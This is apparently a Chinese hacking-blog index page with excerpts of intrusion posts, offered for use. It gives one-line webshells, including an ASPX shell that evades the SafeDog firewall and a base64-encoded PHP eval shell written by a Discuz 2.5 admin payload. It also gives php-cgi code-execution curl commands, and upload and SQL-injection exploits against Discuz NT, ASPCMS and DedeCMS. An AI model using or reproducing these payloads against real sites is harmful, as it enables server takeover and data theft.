可突破安全狗的aspx一句话

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。 服务端一句话木马: <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflec...

- 阅读全文 -

php-cgi漏洞利用EXP

  1、本地包含直接执行代码: curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2、远程包含执行代码: curl https://www.webshell.cc/test.php?-d...

- 阅读全文 -

Discuz NT 多个版本文件上传漏洞

文章作者:rebeyond 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 受影响版本:貌似都受影响。 漏洞文件:tools/ajax.aspx 漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,...

- 阅读全文 -

ASPCMS数据库可插一句话!

aspcms主要是信息发布系统,影响版本为asp。   漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。   数据库默认配置为asp.目录在/data/data.asp下。   利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾   这样就往...

- 阅读全文 -

织梦5.7注入加上传漏洞

会员中心查询会员信息语句过滤不严,导致url可提交注入参数; 会员中心有上传动作过滤不严,导致上传漏洞 详细说明: ①注入漏洞。 这站 https://www.webshell.cc/ 首先访问“/data/admin/ver.txt”页面获取系统最后升级时间, 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图...

- 阅读全文 -

DZ!2.5 后台拿 WebShell 方法!

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...

- 阅读全文 -

杰奇CMS 漏洞

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。 整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合S...

- 阅读全文 -

discuz 后台密码加密hash破解

discuz 密码大家公认的蛋疼 该程序采用碰撞破解 加载字典(各种库中提取的)   <?php error_reporting(0); if ($argc<2) { print_r(' ----------------------------------------------------------------+ Usage: php '.$argv[0].' hash ...

- 阅读全文 -